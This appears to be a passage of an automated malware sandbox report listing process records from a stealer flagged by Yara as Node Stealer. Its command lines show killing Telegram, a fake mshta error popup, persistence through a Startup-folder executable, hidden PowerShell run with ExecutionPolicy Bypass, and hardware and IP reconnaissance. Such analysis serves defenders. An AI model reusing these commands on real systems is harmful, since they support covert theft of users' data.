                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                    Start time:12:22:41
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                    Start time:12:22:41
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:taskkill /IM Telegram.exe /F
                                                                                                                                                                                                                                    Imagebase:0x7ff6ecac0000
                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                    Start time:12:22:41
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png" "
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                    Start time:12:22:41
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7f31f0000
                                                                                                                                                                                                                                    File size:875'008 bytes
                                                                                                                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                    Start time:12:22:41
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
                                                                                                                                                                                                                                    Imagebase:0x330000
                                                                                                                                                                                                                                    File size:2'141'552 bytes
                                                                                                                                                                                                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                    Start time:12:22:41
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2DC.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSC4B6917784BAC4B77A38513830EABEA.TMP"
                                                                                                                                                                                                                                    Imagebase:0xd50000
                                                                                                                                                                                                                                    File size:46'832 bytes
                                                                                                                                                                                                                                    MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                    Start time:12:22:43
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png"
                                                                                                                                                                                                                                    Imagebase:0x7b0000
                                                                                                                                                                                                                                    File size:12'800 bytes
                                                                                                                                                                                                                                    MD5 hash:17FE7B96469646C36413F4B80862DE02
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                    Start time:12:22:45
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                                    Start time:12:22:45
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                                                    Start time:12:22:45
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                                    Start time:12:22:45
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
                                                                                                                                                                                                                                    Imagebase:0x7ff7e4150000
                                                                                                                                                                                                                                    File size:14'848 bytes
                                                                                                                                                                                                                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                                                    Start time:12:22:45
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                                    Start time:12:22:45
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                    Imagebase:0x7ff7bf340000
                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                                    Start time:12:22:55
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe"
                                                                                                                                                                                                                                    Imagebase:0x7ff6c1510000
                                                                                                                                                                                                                                    File size:63'862'037 bytes
                                                                                                                                                                                                                                    MD5 hash:96D6158A2EA98333A66B0505DFB4A95A
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_NodeStealer_1, Description: Yara detected Node Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe, Author: Joe Security
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                                                    Start time:12:22:56
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7f31f0000
                                                                                                                                                                                                                                    File size:875'008 bytes
                                                                                                                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                                                    Start time:12:22:57
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1""
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                                                    Start time:12:22:58
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1"
                                                                                                                                                                                                                                    Imagebase:0x7ff7e5e00000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                                                    Start time:12:22:58
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mydyhibp.cmdline"
                                                                                                                                                                                                                                    Imagebase:0x7ff6778f0000
                                                                                                                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                                                    Start time:12:22:59
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES25A2.tmp" "c:\Users\user\AppData\Local\Temp\CSCDBB13EE0A1FC4822925E9A81EA23E611.TMP"
                                                                                                                                                                                                                                    Imagebase:0x7ff74f780000
                                                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                                                    Start time:12:23:11
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                                                    Start time:12:23:11
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                                                                    Imagebase:0x7ff730760000
                                                                                                                                                                                                                                    File size:421'376 bytes
                                                                                                                                                                                                                                    MD5 hash:1C3645EBDDBE2DA6A32A5F9FB43A3C23
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                                                                    Start time:12:23:12
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:50
                                                                                                                                                                                                                                    Start time:12:23:12
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:wmic bios get smbiosbiosversion
                                                                                                                                                                                                                                    Imagebase:0x7ff6edd80000
                                                                                                                                                                                                                                    File size:526'848 bytes
                                                                                                                                                                                                                                    MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                                                    Start time:12:23:13
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                                                    Start time:12:23:13
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:wmic MemoryChip get /format:list
                                                                                                                                                                                                                                    Imagebase:0x7ff6edd80000
                                                                                                                                                                                                                                    File size:526'848 bytes
                                                                                                                                                                                                                                    MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                                                    Start time:12:23:13
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:find /i "Speed"
                                                                                                                                                                                                                                    Imagebase:0x7ff692ee0000
                                                                                                                                                                                                                                    File size:17'920 bytes
                                                                                                                                                                                                                                    MD5 hash:AE3F3DC3ED900F2A582BAD86A764508C
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                                                    Start time:12:23:14
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                                                    Start time:12:23:14
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                    Imagebase:0x7ff6edd80000
                                                                                                                                                                                                                                    File size:526'848 bytes
                                                                                                                                                                                                                                    MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                                                    Start time:12:23:15
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                                                    Start time:12:23:15
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                                                                                    Imagebase:0x7ff7e5e00000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                                                    Start time:12:23:16
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                                                    Start time:12:23:16
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tasklist /fo csv
                                                                                                                                                                                                                                    Imagebase:0x7ff7bf340000
                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:60
                                                                                                                                                                                                                                    Start time:12:23:17
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber""
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:61
                                                                                                                                                                                                                                    Start time:12:23:17
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber"
                                                                                                                                                                                                                                    Imagebase:0x7ff7e5e00000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:62
                                                                                                                                                                                                                                    Start time:12:23:19
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
